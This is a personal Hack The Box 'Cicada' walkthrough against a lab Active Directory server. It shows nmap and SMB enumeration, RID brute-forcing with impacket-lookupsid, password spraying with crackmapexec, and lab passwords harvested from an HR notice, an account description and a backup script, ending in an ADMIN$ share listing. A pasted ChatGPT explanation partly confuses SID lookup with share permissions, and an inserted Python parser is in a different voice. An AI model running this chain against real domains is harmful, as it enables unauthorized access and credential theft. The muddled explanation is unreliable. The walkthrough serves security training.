HTB Cicada - 🪟
Enumeration
nmap:
nmap -sC -sV -A -T4 -Pn 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 18:39 IST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.15% done; ETC: 18:40 (0:01:09 remaining)
Debugging Increased to 1.
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 6.90% done; ETC: 18:39 (0:00:40 remaining)
Current sending rates: 40.57 packets / s, 1652.82 bytes / s.
Overall sending rates: 190.49 packets / s, 8381.56 bytes / s.
Packet capture filter (device tun0): dst host 10.10.14.90 and (icmp or (tcp and (src host 10.10.11.35)))
OS detection timingRatio() == (1739797810.737 - 1739797810.236) * 1000 / 500 == 1.002
OS detection timingRatio() == (1739797813.609 - 1739797813.107) * 1000 / 500 == 1.002
Packet capture filter (device tun0): (ip or ip6) and dst host 10.10.14.90
mass_rdns: 0.02s 0/2 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 2]
DNS resolution of 2 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 2, DR: 0, SF: 0, TR: 2, CN: 0]
NSE: Script scanning 10.10.11.35.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting smb-os-discovery against 10.10.11.35.
NSE: Starting nbstat against 10.10.11.35.
NSE: Starting smb-security-mode against 10.10.11.35.
NSE: Starting sslv2 against 10.10.11.35:3269.
NSE: Starting smb2-security-mode against 10.10.11.35.
NSE: Starting sslv2 against 10.10.11.35:389.
NSE: Starting address-info against 10.10.11.35.
NSE: Finished address-info against 10.10.11.35.
NSE: Starting p2p-conficker against 10.10.11.35.
NSE: [p2p-conficker 10.10.11.35] Conficker: Generating ports based on ip (0x230b0a0a) and seed (2876)
NSE: Starting smb2-time against 10.10.11.35.
NSE: Starting dns-nsid against 10.10.11.35:53.
NSE: Starting sslv2 against 10.10.11.35:3268.
NSE: Starting sslv2 against 10.10.11.35:636.
NSE: Finished sslv2 against 10.10.11.35:3269.
NSE: [smb-os-discovery 10.10.11.35] SMB: Added account '' to account list
NSE: [smb-os-discovery 10.10.11.35] SMB: Added account 'guest' to account list
NSE: Finished sslv2 against 10.10.11.35:389.
NSE: Finished sslv2 against 10.10.11.35:636.
NSE: [smb-os-discovery 10.10.11.35] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: Finished smb-os-discovery against 10.10.11.35.
NSE: Finished sslv2 against 10.10.11.35:3268.
NSE: [smb-security-mode 10.10.11.35] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: Finished smb-security-mode against 10.10.11.35.
NSE: Finished nbstat against 10.10.11.35.
NSE: [dns-nsid 10.10.11.35:53] dns.query() got zero responses attempting to resolve query: id.server
NSE: Finished smb2-security-mode against 10.10.11.35.
NSE: Finished smb2-time against 10.10.11.35.
NSE: [ms-sql-info 10.10.11.35:389] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: [ms-sql-info 10.10.11.35:389] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: [ms-sql-info 10.10.11.35:389] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: [dns-nsid 10.10.11.35:53] dns.query() got zero responses attempting to resolve query: version.bind
NSE: Finished dns-nsid against 10.10.11.35:53.
NSE: Finished p2p-conficker against 10.10.11.35.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting ssl-cert against 10.10.11.35:3268.
NSE: Starting ssl-date against 10.10.11.35:3268.
NSE: Starting ssl-date against 10.10.11.35:389.
NSE: Starting rpc-grind against 10.10.11.35:464.
NSE: Starting ssl-known-key against 10.10.11.35:3269.
NSE: Starting tls-alpn against 10.10.11.35:3269.
NSE: Starting tls-nextprotoneg against 10.10.11.35:3268.
NSE: Starting ssl-cert against 10.10.11.35:389.
NSE: Starting ssl-known-key against 10.10.11.35:636.
NSE: Starting ssl-cert against 10.10.11.35:3269.
NSE: Starting ssl-cert against 10.10.11.35:636.
NSE: Starting rpc-grind against 10.10.11.35:445.
NSE: Starting tls-alpn against 10.10.11.35:3268.
NSE: Starting tls-nextprotoneg against 10.10.11.35:636.
NSE: Starting tls-alpn against 10.10.11.35:636.
NSE: Starting ssl-date against 10.10.11.35:636.
NSE: Starting ssl-date against 10.10.11.35:3269.
NSE: Starting tls-nextprotoneg against 10.10.11.35:389.
NSE: Starting tls-alpn against 10.10.11.35:389.
NSE: Starting tls-nextprotoneg against 10.10.11.35:3269.
NSE: [rpc-grind 10.10.11.35:445] isRPC didn't receive response.
NSE: [rpc-grind 10.10.11.35:445] Target port 445 is not a RPC port.
NSE: Finished rpc-grind against 10.10.11.35:445.
NSE: [rpc-grind 10.10.11.35:464] isRPC didn't receive response.
NSE: [rpc-grind 10.10.11.35:464] Target port 464 is not a RPC port.
NSE: Finished rpc-grind against 10.10.11.35:464.
NSE: [tls-alpn 10.10.11.35:636] Server did not return TLS ALPN extension.
NSE: [tls-alpn 10.10.11.35:636] None of 31 protocols chosen
NSE: Finished tls-alpn against 10.10.11.35:636.
NSE: [tls-alpn 10.10.11.35:3269] Server did not return TLS ALPN extension.
NSE: [tls-alpn 10.10.11.35:3269] None of 31 protocols chosen
NSE: Finished tls-alpn against 10.10.11.35:3269.
NSE: [tls-nextprotoneg 10.10.11.35:3269] Server does not support TLS NPN extension.
NSE: Finished tls-nextprotoneg against 10.10.11.35:3269.
NSE: [tls-nextprotoneg 10.10.11.35:636] Server does not support TLS NPN extension.
NSE: Finished tls-nextprotoneg against 10.10.11.35:636.
NSE: Finished ssl-cert against 10.10.11.35:3268.
NSE: [tls-nextprotoneg 10.10.11.35:3268] Server does not support TLS NPN extension.
NSE: Finished tls-nextprotoneg against 10.10.11.35:3268.
NSE: [tls-alpn 10.10.11.35:389] Server did not return TLS ALPN extension.
NSE: [tls-alpn 10.10.11.35:389] None of 31 protocols chosen
NSE: Finished tls-alpn against 10.10.11.35:389.
NSE: [tls-alpn 10.10.11.35:3268] Server did not return TLS ALPN extension.
NSE: [tls-alpn 10.10.11.35:3268] None of 31 protocols chosen
NSE: Finished tls-alpn against 10.10.11.35:3268.
NSE: [tls-nextprotoneg 10.10.11.35:389] Server does not support TLS NPN extension.
NSE: Finished tls-nextprotoneg against 10.10.11.35:389.
NSE: Finished ssl-known-key against 10.10.11.35:3269.
NSE: Finished ssl-cert against 10.10.11.35:389.
NSE: Finished ssl-date against 10.10.11.35:636.
NSE: Finished ssl-known-key against 10.10.11.35:636.
NSE: Finished ssl-date against 10.10.11.35:3269.
NSE: Finished ssl-cert against 10.10.11.35:3269.
NSE: Finished ssl-cert against 10.10.11.35:636.
NSE: Finished ssl-date against 10.10.11.35:3268.
NSE: Finished ssl-date against 10.10.11.35:389.
NSE: Starting runlevel 3 (of 3) scan.
NSE: Starting clock-skew against 10.10.11.35.
NSE: Finished clock-skew against 10.10.11.35.
Nmap scan report for 10.10.11.35
Host is up (0.21s latency).
Scanned at 2025-02-17 18:39:10 IST for 108s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-17 20:09:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (89%)
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=2/17%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=67B33562%P=aarch64-unknown-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10B%TI=I%II=I%SS=S%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-17T20:10:21
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-security-mode:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 6h59m59s
| nbstat:
|_ ERROR: Name query failed: TIMEOUT
| smb-os-discovery:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 218.85 ms 10.10.14.1
2 218.92 ms 10.10.11.35
Final times for host: srtt: 211927 rttvar: 3368 to: 225399
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting runlevel 3 (of 3) scan.
NSE: Starting clock-skew.
NSE: Finished clock-skew.
Read from /usr/share/nmap: nmap-os-db nmap-protocols nmap-service-probes nmap-services.
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.89 seconds
smbmap:
smbmap -H 10.10.11.35 -u guest
[+] IP: 10.10.11.35:445 Name: cicada.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
smbclient //10.10.11.35/HR
Password for [WORKGROUP\d31ty]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 17:59:09 2024
.. D 0 Thu Mar 14 17:51:29 2024
Notice from HR.txt A 1266 Wed Aug 28 23:01:48 2024
4168447 blocks of size 4096. 418650 blocks available
smb: \>
┌──(d31ty㉿kali)-[~/Downloads/HTB/cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Here I got clueless about how to proceed further, because the ‘Notice from HR.txt’ contained the password and I didn’t know how to move forward. So in the writeup, they used the Lookupsid technique.
Lookupsid
Now that we have found this password, we could try checking to see if any accounts are still using this password. To do this, we must find out all the users that are in the domain, and we can do this using Impacket’s lookupsid module. This tool will try brute forcing Windows Security Identifiers (SIDs) of any users in the AD domain. Each user has a unique SID, which is comprised of their relative identifier (RID) concatenated with the domain SID. User SIDs are typically issued by a Domain Controller and are used in authorization and access mechanisms, such as to form a part of the access token created during sign-in.
I couldn’t understand why, out of all techniques, they were using this; here comes the GPT…
If you know, what is IPC$ and SID lookup, you can skip to the next section. [[#Enumeration [Contd.]]]
Great question! Let’s break down why Lookupsid is used during the enumeration phase when you’re looking at something like SMB shares, particularly in the case of finding a share like IPC$.
What is IPC$?
The IPC$ (Inter-Process Communication) share in Windows is a special, hidden SMB share used for communication between processes on a network. It’s mainly used for administrative tasks and remote access like file and printer sharing, and it allows remote applications or services to connect to the system for inter-process communication.
Scenario: IPC$ Share Read-Only
- If you’re scanning SMB shares and you find that IPC$ is read-only, it typically means the server is allowing remote connections, but it’s restricting write access. This is a common configuration for system and admin-level communications but does not directly allow file transfers or modifications. It might still allow you to gather information, especially in terms of enumerating available shares or querying the system for information (e.g., users, groups, domain info).
Why Use Lookupsid During Enumeration?
During enumeration in pentesting, tools like Lookupsid become useful for a few reasons:
1. SID Discovery in SMB Enumeration
- While performing SMB enumeration, you might find that certain shares or resources are linked to specific SIDs in access control lists (ACLs) or other security-related configurations.
- IPC$ is a share commonly referenced by system processes and administrators. However, it’s also a place where you might encounter SIDs during enumeration, either from SMB scans or from file shares that have specific user/group access defined by SID (not just by names like Everyone, Administrators, etc.).
2. Identifying Users and Groups
- When you look at share permissions (for example, through tools like smbclient, enum4linux, or nmap), you might see SIDs listed in ACLs or security descriptors. These SIDs could represent specific users or groups on the machine. Lookupsid helps you resolve these SIDs to actual user or group names. For example, if you find that S-1-5-32-544 is the SID associated with the IPC$ share’s permissions, Lookupsid will help you translate that to a real user/group name, such as Administrators.
- By using Lookupsid during enumeration, you get a clear picture of who has access to certain resources, even if the share is restricted (read-only). This is critical in understanding access control and knowing which accounts or groups you might target later for privilege escalation or lateral movement.
3. Understanding Privileges and Access Control
- You might not have write access to IPC$, but you can still get information from it. For example, by enumerating access control lists (ACLs), you may discover which user or group (represented by a SID) has permissions to use the share.
- Knowing who has access can guide your actions during the enumeration phase. For example, if you find that Domain Admins (or another high-privilege group) has some form of access to the share, this could suggest that privilege escalation opportunities might exist.
- This information is especially valuable in larger Active Directory environments, where privileges and access can be very granular and distributed across multiple users and groups.
4. Mapping Network Access
- During enumeration, you might encounter restricted resources (like IPC$), but knowing who has access can help you map out the network and understand which accounts are active and have specific permissions to certain shares or resources.
- SIDs can be found in places like Windows event logs, SMB session details, or even Windows registry keys, which you can examine to get more details. Using Lookupsid on these SIDs can show you which users/groups are tied to a particular set of permissions or shares.
5. Exploiting Information from SMB Shares
- While you may not have write access to IPC$, it suggests that this user might have additional administrative shares available elsewhere on the network.
- Enumerating SIDs and resolving them via Lookupsid helps you identify where privileged users are located and what their permissions might be, helping you plan your next steps for pivoting or privilege escalation.
In Summary:
- Lookupsid is useful during the enumeration phase because it allows you to translate SIDs into user and group names.
- By understanding which users or groups have access to resources (like IPC$), you can begin to map out user privileges, identify high-value targets for privilege escalation, and plan your lateral movement in the network.
- Even if the share is read-only, knowing who has access can reveal important information for the next stages of your pentest, such as privilege escalation or lateral movement across the network.
Enumeration [Contd.]
impacket
impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
From the scan we filtered the usernames and saved them to user.txt for the IPC$ enumeration.
Then the crackmapexec tool came in handy to find which user still has the default password.
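The lookupsid output above is just text, and the "filtering" step is worth seeing in code. The following is an added example (not from the writeup, the HTB official walkthrough, or Impacket): it parses the output, rebuilds each principal's full SID as domain SID plus RID, separates the well-known RIDs below 1000 from the ones the DC issued to objects created later, and returns the SidTypeUser names in the one-per-line form that user.txt needs. The S-1-5-32-544 mentioned in the GPT explanation above is the BUILTIN\Administrators alias, a well-known SID with no domain component at all, which is why the RID split below refuses anything that does not start with the domain SID. The sample text is constructed from the lookupsid lines on this page.

```python
"""Parse impacket-lookupsid output, rebuild each principal's full SID and pull out
the plain user accounts. Added example, not code from the writeup or from Impacket;
the sample text is constructed from the lookupsid lines shown above."""
import re
from dataclasses import dataclass

# Constructed sample: an abridged copy of the lookupsid output from this box.
SAMPLE_OUTPUT = """\
[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
500: CICADA\\Administrator (SidTypeUser)
501: CICADA\\Guest (SidTypeUser)
502: CICADA\\krbtgt (SidTypeUser)
512: CICADA\\Domain Admins (SidTypeGroup)
1000: CICADA\\CICADA-DC$ (SidTypeUser)
1104: CICADA\\john.smoulder (SidTypeUser)
1105: CICADA\\sarah.dantelia (SidTypeUser)
1106: CICADA\\michael.wrightson (SidTypeUser)
1108: CICADA\\david.orelious (SidTypeUser)
1109: CICADA\\Dev Support (SidTypeGroup)
1601: CICADA\\emily.oscars (SidTypeUser)
"""

# A domain SID is S-1-5-21 followed by three 32-bit sub-authorities.
DOMAIN_SID_RE = re.compile(r"Domain SID is: (S-1-5-21(?:-\d+){3})")
# "<rid>: <DOMAIN>\<name> (<SidType>)"
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$")


@dataclass(frozen=True)
class SidEntry:
    rid: int
    domain: str
    name: str
    sid_type: str
    sid: str  # full SID = domain SID + "-" + RID


def parse_lookupsid(text):
    """Return (domain_sid, [SidEntry, ...]) from lookupsid's text output."""
    m = DOMAIN_SID_RE.search(text)
    if m is None:
        raise ValueError("no 'Domain SID is:' line in output")
    domain_sid = m.group(1)
    entries = []
    for line in text.splitlines():
        em = ENTRY_RE.match(line.strip())
        if em is None:
            continue  # banner and progress lines
        rid = int(em.group(1))
        entries.append(SidEntry(rid, em.group(2), em.group(3), em.group(4),
                                f"{domain_sid}-{rid}"))
    return domain_sid, entries


def rid_of(sid, domain_sid):
    """Split the RID off a full SID, refusing SIDs that are not from this domain
    (e.g. BUILTIN\\Administrators, S-1-5-32-544, has no domain component)."""
    if not sid.startswith(domain_sid + "-"):
        raise ValueError(f"{sid} is not a {domain_sid} SID")
    return int(sid[len(domain_sid) + 1:])


def is_well_known_rid(rid):
    """RIDs below 1000 are reserved for built-in principals (500 Administrator,
    501 Guest, 502 krbtgt, 512 Domain Admins, ...); the DC hands out 1000+ to
    objects created later, so those are the accounts an administrator added."""
    return rid < 1000


def user_accounts(entries, include_machine=False):
    """Names of SidTypeUser entries. Machine accounts end in '$' and are skipped
    unless asked for, since a human's default password does not apply to them."""
    return [e.name for e in entries
            if e.sid_type == "SidTypeUser"
            and (include_machine or not e.name.endswith("$"))]


if __name__ == "__main__":
    dom, ents = parse_lookupsid(SAMPLE_OUTPUT)
    print("domain SID:", dom)
    for e in ents:
        tag = "well-known" if is_well_known_rid(e.rid) else "created"
        print(f"{e.sid}  {e.domain}\\{e.name}  {e.sid_type}  [{tag}]")
    # One name per line is the user.txt format that crackmapexec -u reads.
    print("\n".join(user_accounts(ents)))
```

Run it against a saved copy of the real output (`python3 sids.py < lookupsid.txt` after swapping the sample for `sys.stdin.read()`) and the last block of output is user.txt. On the defender side the same parse is a cheap check that anonymous or guest SID enumeration over the lsarpc pipe is still possible, which is what the guest session above demonstrated.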
crackmapexec smb cicada.htb -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Valid user: michael.wrightson
Then again, I referred to the writeup for this step, and I learned that crackmapexec can be a great tool in various aspects.
Enumeration Phase II
crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB cicada.htb 445 CICADA-DC [+] Enumerated domain user(s)
SMB cicada.htb 445 CICADA-DC cicada.htb\emily.oscars badpwdcount: 0 desc:
SMB cicada.htb 445 CICADA-DC cicada.htb\david.orelious badpwdcount: 1 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB cicada.htb 445 CICADA-DC cicada.htb\michael.wrightson badpwdcount: 0 desc:
SMB cicada.htb 445 CICADA-DC cicada.htb\sarah.dantelia badpwdcount: 6 desc:
SMB cicada.htb 445 CICADA-DC cicada.htb\john.smoulder badpwdcount: 6 desc:
SMB cicada.htb 445 CICADA-DC cicada.htb\krbtgt badpwdcount: 5 desc: Key Distribution Center Service Account
SMB cicada.htb 445 CICADA-DC cicada.htb\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB cicada.htb 445 CICADA-DC cicada.htb\Administrator badpwdcount: 7 desc: Built-in account for administering the computer/domain
Now we have david.orelious’s password, left in his account description: aRt$Lp#7t*VQ!3
This user has read access to the DEV share:
crackmapexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB cicada.htb 445 CICADA-DC [+] Enumerated shares
SMB cicada.htb 445 CICADA-DC Share Permissions Remark
SMB cicada.htb 445 CICADA-DC ----- ----------- ------
SMB cicada.htb 445 CICADA-DC ADMIN$ Remote Admin
SMB cicada.htb 445 CICADA-DC C$ Default share
SMB cicada.htb 445 CICADA-DC DEV READ
SMB cicada.htb 445 CICADA-DC HR READ
SMB cicada.htb 445 CICADA-DC IPC$ READ Remote IPC
SMB cicada.htb 445 CICADA-DC NETLOGON READ Logon server share
SMB cicada.htb 445 CICADA-DC SYSVOL READ Logon server share
![[Screenshot 2025-02-19 at 18.19.44.png]]
Later I enumerated the other shares and found no interesting information.
cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Now we have the password of user emily.oscars, hardcoded in Backup_script.ps1: Q!3@Lp#M6b*7t*Vt
So now let’s try the ADMIN$ and C$ shares.
![[Screenshot 2025-02-19 at 18.24.28.png]]
┌──(d31ty㉿kali)-[~/Downloads/HTB/cicada]
└─$ smbclient //10.10.11.35/ADMIN$ -U emily.oscars
Password for [WORKGROUP\emily.oscars]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Sep 23 22:05:40 2024
.. DHS 0 Thu Feb 20 01:12:37 2025
$Reconfig$ D 0 Wed Aug 21 21:23:29 2024
ADFS D 0 Sat May 8 14:04:49 2021
ADWS D 0 Thu Mar 14 16:31:01 2024
appcompat D 0 Thu Aug 22 04:54:41 2024
apppatch D 0 Fri Aug 30 04:21:02 2024
AppReadiness D 0 Fri Aug 30 04:29:10 2024
assembly DR 0 Sat May 8 15:12:41 2021
AzureArcSetup D 0 Fri Aug 30 04:20:56 2024
bcastdvr D 0 Sat May 8 13:50:24 2021
bfsvc.exe A 114688 Fri Aug 30 04:09:26 2024
Boot D 0 Fri Aug 30 04:20:57 2024
bootstat.dat AS 67584 Wed Feb 19 16:47:06 2025
Branding D 0 Sat May 8 13:50:24 2021
BrowserCore D 0 Fri Aug 30 04:21:03 2024
CAPolicy.inf A 76 Fri Aug 23 01:54:34 2024
CbsTemp D 0 Mon Sep 23 22:02:14 2024
certenroll.log A 849 Fri Aug 23 01:48:37 2024
certocm.log A 238330 Fri Aug 23 02:05:46 2024
Containers D 0 Sat May 8 13:50:24 2021
Cursors D 0 Sat May 8 13:50:26 2021
debug D 0 Wed Feb 19 16:31:42 2025
diagnostics D 0 Sat May 8 14:04:49 2021
DiagTrack D 0 Sat May 8 14:04:49 2021
DigitalLocker D 0 Sat May 8 15:05:26 2021
Downloaded Program Files DS 0 Sat May 8 13:50:26 2021
drivers D 0 Sat May 8 13:50:24 2021
DtcInstall.log A 2327 Fri Aug 30 04:24:56 2024
ELAMBKUP DH 0 Sat May 8 13:50:26 2021
en-US D 0 Sat May 8 15:06:49 2021
explorer.exe A 4839992 Fri Aug 30 04:09:32 2024
Fonts DSR 0 Fri Aug 30 04:21:03 2024
Globalization D 0 Sat May 8 14:04:49 2021
Help D 0 Sat May 8 15:05:26 2021
HelpPane.exe A 1097728 Fri Aug 30 04:08:54 2024
hh.exe A 36864 Sat May 8 13:44:45 2021
IdentityCRL D 0 Sat May 8 14:04:49 2021
IME D 0 Thu Mar 3 09:28:19 2022
ImmersiveControlPanel DR 0 Fri Aug 30 04:21:03 2024
INF D 0 Wed Feb 19 16:35:50 2025
InputMethod D 0 Sat May 8 14:04:49 2021
Installer DHS 0 Thu Aug 22 22:50:03 2024
L2Schemas D 0 Sat May 8 13:50:27 2021
LiveKernelReports D 0 Sat May 8 13:50:24 2021
